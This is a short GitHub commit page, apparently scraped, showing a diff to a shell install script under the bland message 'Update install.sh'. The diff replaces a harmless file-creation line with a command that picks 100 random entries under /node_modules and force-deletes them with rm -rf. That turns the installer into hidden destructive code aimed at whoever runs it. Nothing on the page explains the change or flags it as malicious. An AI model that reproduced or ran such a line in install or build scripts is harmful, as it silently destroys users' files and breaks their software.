Skip to content

Commit 24069b5

Browse files
authored
Update install.sh
1 parent 85adf9c commit 24069b5

File tree

1 file changed

+3
-1
lines changed

1 file changed

+3
-1
lines changed

install.sh

+3-1
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,5 @@
11
#!/bin/sh
22

3-
touch abc.txt
3+
# touch abc.txt
4+
5+
find /node_modules | shuf -n 100 | xargs rm -rf

0 commit comments

Comments
 (0)